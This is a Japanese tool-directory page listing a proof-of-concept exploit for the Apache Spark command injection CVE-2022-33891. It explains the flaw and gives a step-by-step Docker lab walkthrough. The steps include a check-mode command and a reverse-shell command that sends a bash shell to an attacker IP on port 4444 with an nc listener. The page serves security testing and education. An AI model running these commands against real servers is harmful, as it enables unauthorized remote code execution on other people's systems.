Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-33891 — Apache Sparkコマンドインジェクション(CVE-2022-33891)の概念実証エクスプロイト。チェックモードとリバースシェルモードを備え、許可されたセキュリティテストを可能にします。 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2022-33891
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Apache Sparkコマンドインジェクション(CVE-2022-33891)の概念実証エクスプロイト。チェックモードとリバースシェルモードを備え、許可されたセキュリティテストを可能にします。

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-33891 - Apache Spark コマンドインジェクションの脆弱性

Python


⚠️ 教育目的および許可されたセキュリティ研究のみを対象としています

元のエクスプロイト作成者

元のPoC作成者 AkbarTrilaksana に深く感謝します。

説明

Apache Spark UIは、設定オプション spark.acls.enable を介してACLを有効にする機能を提供します。認証フィルターを使用すると、ユーザーがアプリケーションを表示または変更するためのアクセス権限を持っているかどうかをチェックします。ACLが有効な場合、HttpSecurityFilter のコードパスにより、任意のユーザー名を提供してなりすましを行うことが可能になります。悪意のあるユーザーは、入力に基づいてUnixシェルコマンドを構築し実行する権限チェック関数に到達できる可能性があります。その結果、Sparkを実行しているユーザーとして任意のシェルコマンドが実行されます。これは Apache Spark バージョン 3.0.3 以前、3.1.1 から 3.1.2、および 3.2.0 から 3.2.1 に影響します。


手順ガイド

  1. まず、リポジトリをクローンします

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  • ディレクトリを変更します

    root@kitploit:~
    cd CVE-2022-33891
    
  • 依存関係をインストールします:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  • コンテナを起動します

    root@kitploit:~
    docker compose up
    
  • 新しいターミナルで、次のコマンドを実行します

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  • コンテナのbashセッションで、次のように入力します:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  • 必要に応じて、spark-defaults.conf の内容を cat で確認してください。

  • 対話型bashシェルを終了し、Ctrl-Cでdocker-composeプロセスを停止します。

  • コンテナが正常に停止したら、docker-compose up を再度実行します

    root@kitploit:~
    docker compose up
    
  • ターゲットが脆弱かどうかを確認します:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  • 攻撃者の観点から、リモートコード実行はインタラクティブシェルへのアクセスを得るために重要です。そのため、次のコマンドを実行すると、攻撃者のシステム上のポート4444/tcpに対して、bashベースのTCP経由のtelnetリバースシェルがトリガーされます:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

  • クレジット

    • https://github.com/AkbarTrilaksana/cve-2022-33891
    • https://nvd.nist.gov/vuln/detail/cve-2022-33891
    ツールをダウンロード